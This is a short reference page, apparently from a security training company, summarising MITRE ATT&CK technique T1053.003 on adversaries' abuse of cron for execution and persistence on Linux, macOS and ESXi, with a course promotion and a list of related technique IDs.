- Tactics
- Execution , Persistence , Privilege Escalation
- Platforms
- Linux, macOS, ESXi
- Reference
- attack.mitre.org/techniques/T1053.003
Description
Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.
An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for Persistence. In ESXi environments, cron jobs must be created directly via the crontab file (e.g., /var/spool/cron/crontabs/root).(Citation: CloudSEK ESXiArgs 2023)
How GTK Cyber trains on this
GTK Cyber's hands-on training programs cover detection engineering across the MITRE ATT&CK framework, including the Execution, Persistence, Privilege Escalation tactic this technique falls under. Our practitioner-led courses focus on building real detections, not just memorizing technique IDs.
Related techniques
- T1037 — Boot or Logon Initialization Scripts
- T1047 — Windows Management Instrumentation
- T1053 — Scheduled Task/Job
- T1055 — Process Injection
- T1059 — Command and Scripting Interpreter
- T1068 — Exploitation for Privilege Escalation
- T1072 — Software Deployment Tools
- T1078 — Valid Accounts
- T1098 — Account Manipulation
- T1106 — Native API
- T1112 — Modify Registry
- T1127 — Trusted Developer Utilities Proxy Execution